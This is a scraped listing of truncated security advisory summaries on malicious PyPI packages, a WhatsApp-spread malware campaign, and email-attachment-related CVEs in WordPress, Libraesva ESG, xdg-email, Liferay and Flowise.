EUVD-2025-26130

Malicious code in bioql PyPI...

EUVD-2025-18803

Malicious code in bioql PyPI...

EUVD-2022-3352

Malicious code in bioql PyPI...

EUVD-2023-54766

Malicious code in bioql PyPI...

EUVD-2022-37504

Malicious code in bioql PyPI...

EUVD-2022-48670

Malicious code in bioql PyPI...

MAL-2025-191712 Malicious code in d1snakegame (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8023a44d657b04f09628c938fa7fb4fbd8c1300f630aff31837b32f2337ce65f The package starts a Discord bot that waits for messages and automatically executes any file sent as an attachment, effectively turning the package into a RAT...

Malicious code in d1snakegame (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8023a44d657b04f09628c938fa7fb4fbd8c1300f630aff31837b32f2337ce65f The package starts a Discord bot that waits for messages and automatically executes any file sent as an attachment, effectively turning the package into a RAT...

Self-Propagating Malware Spreading Via WhatsApp, Targets Brazilian Users

Trend™ Research has identified an active campaign spreading via WhatsApp through a ZIP file attachment. When executed, the malware establishes persistence and hijacks the compromised WhatsApp account to send copies of itself to the victim’s contacts...

Directory Traversal

Overview redmine-mcp-server is a Production-ready MCP server for Redmine with security, pagination, and enterprise features Affected versions of this package are vulnerable to Directory Traversal via the MCP endpoint. An attacker can gain an access to restricted files by passing a specially craft...

A flaw was found in the xdg-email component of xdg-utils-1.1.0-rc1 and newer. When handling mailto: URIs, xdg-email allows attachments to be discreetly added via the URI when being passed to Thunderbird. An attacker could potentially send a victim a URI that automatically attaches a sensitive file to a new email. If a victim user does not notice that an attachment was added and sends the email, this could result in sensitive information disclosure. It has been confirmed that the code behind this issue is in xdg-email and not in Thunderbird.

...

CVE-2025-9762

The Post By Email plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the saveattachments function in all versions up to, and including, 1.0.4b. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...

CVE-2025-9762 Post By Email <= 1.0.4b - Unauthenticated Arbitrary File Upload via Email Attachments

The Post By Email plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the saveattachments function in all versions up to, and including, 1.0.4b. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...

CVE-2025-9762

CVE-2025-9762 affects the WordPress plugin Post By Email (versions ≤ 1.0.4b). The vulnerability arises from missing file type validation in save_attachments, allowing unauthenticated arbitrary file uploads to the server, with potential for remote code execution. Wordfence’s vulnerability report q...

WordPress plugin Post By Email Operating System Command Injection Vulnerability

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a blogging platform developed using the PHP language. WordPress is a blogging platform developed using the PHP language, which provides the ability to host a personal blog site on a PHP and MySQL based...

VulnCheck KEV: CVE-2025-59689

Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For...

Libraesva Email Security Gateway 安全漏洞

Libraesva Email Security Gateway is an email security gateway from Libraesva Italy. A security vulnerability exists in Libraesva Email Security Gateway versions prior to 4.5 to 5.5.7, which stems from improper handling of compressed email attachments and can lead to command injection attacks...

EUVD-2025-30249

Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For...

Denial Of Service (DoS)

com.liferay.portal, release.portal.bom are vulnerable to Denial Of Service DoS. The vulnerability is due to allowing unlimited file uploads through object entries attachment fields, which are stored in the documentlibrary, allowing an attacker to cause a potential Denial-of-Service DDoS attack...

Flowise has arbitrary file access due to missing chat flow id validation

Summary Missing chat flow id validation allows an attacker to access arbitrary file. Details Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for filenam...